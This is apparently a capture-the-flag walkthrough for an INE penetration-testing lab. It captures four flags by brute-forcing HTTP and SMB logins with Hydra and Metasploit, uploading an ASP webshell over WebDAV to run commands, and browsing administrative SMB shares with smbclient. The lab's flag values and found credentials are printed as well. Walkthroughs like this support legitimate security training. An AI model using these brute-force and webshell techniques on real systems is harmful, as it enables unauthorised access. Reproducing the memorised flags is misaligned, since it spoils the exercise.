CFT 1 INE - Host & Network Penetration Testing: System-Host Based Attacks

Objective: Perform system/host-based attacks on the target and capture all the flags hidden within the environment.

Useful files:

/usr/share/metasploit-framework/data/wordlists/common_users.txt,

/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt,

/usr/share/webshells/asp/webshell.asp

Flags to Capture:

  • Flag 1: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local)

  • Flag 2: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)

  • Flag 3: By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag. (target2.ine.local)

  • Flag 4: The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)

Tools

  • Nmap

  • Hydra

  • Cadaver

  • Metasploit Framework

Flag 1: User 'bob' might not have chosen a strong password. Try common passwords. (target1.ine.local)

Solution: Target = target1.ine.local

Resolve dns to ip > resolveip target1.inelocal > 10.3.18.27 (subject to change)

perfrom an Nmap scan > nmap -sV -sC 10.3.18.27

Result > 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: 401 - Unauthorized: Access is denied due to invalid credentials. | http-auth: | HTTP/1.1 401 Unauthorized\x0D

Open webbrowser and naviagte to ip address > http://10.3.18.27

Notice the url has a form requires username and password which has not been provided

Bruteforcing the form at http://10.3.19.10/ > hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 10.3.18.27 http-get /

Result > [80][http-get] host: 10.3.18.27 login: bob password: password_123321

Login into the site url credentials found:

Perform directory enum using dirburster > dirb http://target1.ine.local -u bob:password_123321

Result ==> DIRECTORY: http://target1.ine.local/webdav/

To find flag 1: navigate to http://10.3.18.27/webdav

Then click on 34 flag1.txt file to reveal flag > 4ccc8664b99f44158dd3e42c46ae39eb

Flag 2: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)

Run > davtest -url http://10.3.18.27/webdav

Result: OPEN FAIL: http://10.3.18.27/webdav Unauthorized. Basic realm="10.3.18.27" > Requires authentication credentials

rerun davtest -auth bob:password_123321 -url http://10.3.18.27/webdav

Result: Checking for test file execution

The above screenshot shows that we can upload the succeed files to the /webdav directory and we can use cadaver to achieve this.

run > cadaver http://10.3.18.27/webdav > enter username: bob and password: password_123321

Open a new terminal find asp webshell to upload to the /webdav directory using cadaver

run > ls -al /usr/share/webshells/asp

Return back to cadaver terminal and uplaod webshell.asp to /webdav > run put /usr/share/webshells/asp/webshell.asp

Navigate back to http://10.3.18.27/webdav > see that webshell.asp has been uploaded successfully.

Select webshell.asp to run the file and open a textbox to run commands

run some basic commands in the textbox: whoami, ipconfig.

To obtain flag > run dir C:\ to list files Directory of c:\ > 34 flag2.txt

run type C:\flag.txt > 10.3.18.27f92fd94258a149a296300195335f3e54

Flag 3: SMB shares might contain hidden files. Check the available shares. (target2.ine.local)

Target > target2.ine.local > 10.3.21.145

nmap scan: nmap -sC -sV -O 10.3.21.145 > 445/tcp open microsoft-ds Windows Server 2019 Datacenter 17763 microsoft-ds

run service postgresql start && msfconsole

search type:auxiliary name:smb

use 37 auxiliary/scanner/smb/smb_enumusers

set RHOSTS 10.3.21.145 then run

result > Error: Msf::Exploit::Remote::SMB::Client::Ipc::SmbIpcAuthenticationError Unable to authenticate

we can brute force the authentication proces using metasplopit module: smb_login

search smb_login

use 24 auxiliary/scanner/smb/smb_login . normal No SMB Login Check Scanner

run options > set RHOSTS 10.3.21.145

set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

set verbose to false

then run

Results >Bruteforce completed, 4 credentials were successful.

10.3.21.145:445 - Success: '.\rooty:spongebob'

10.3.21.145:445 - Success: '.\demo:password1'

10.3.21.145:445 - Success: '.\auditor:hellokitty'

10.3.21.145:445 - Success: '.\administrator:pineapple' Administrator

We can proceed to login into smb using of the credentials found

To do this we can use a utility called smbclient

syntax > smbclient -L //<server> -U

-L: Tells smbclient to list the shares.

//<server>: The IP address or hostname of the SMB server.

-U : The username to authenticate with (optional).

-p for specifying a password

Open a new terminal

run smbclient -L //10.3.21.145/ -U administrator%pineapple

Result: : Sharename Type Comment --------- ---- -------

ADMIN$ Disk Remote

Admin C$ Disk Default share

IPC$ IPC Remote IPC

Shared Disk Shared2 Disk Shared3 Disk

The Admin account has 6 Shares

We can Access a share using the following Syntax

smbclient //server/share -U username%password

//server/share: The server IP/hostname and the name of the share you want to access.

-U username%password: The username and password to authenticate with.

smbclient //10.3.21.145/ADMIN$ -U administrator%pineapple

run ls : no flag in this share

check C$ share

run smbclient //10.3.21.145/C$ -U administrator%pineapple

run ls to list files

Result > flag3.txt A 34 Fri Jan 17 18:12:36 2025

To view the flag3.txt

run get flag3.txt > getting file \flag3.txt of size 34 as flag3.txt (2.8 KiloBytes/sec)

Open a new terminal

run ls then cat flag3.txt > f4eb9f7602c1489fb9dac39fcae39c38

Flag 4 : The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)

While still in the C$ share smbclient terminal > smb:> run cd Users\ smb: \Users> ls then cd Administrator\ smb: \Users\Administrator> ls then cd Desktop\ smb: \Users\Administrator\Desktop> ls

Result> flag4.txt A 34 Fri Jan 17 18:12:36 2025

Again read files run get flag4.txt > getting file \Users\Administrator\Desktop\flag4.txt of size 34 as flag4.txt

Open a new terminal > ls

run cat flag4.txt > 15c81e33cb9a40e5931a57bfd4f6b869

PreviousCapture the Flags

Last updated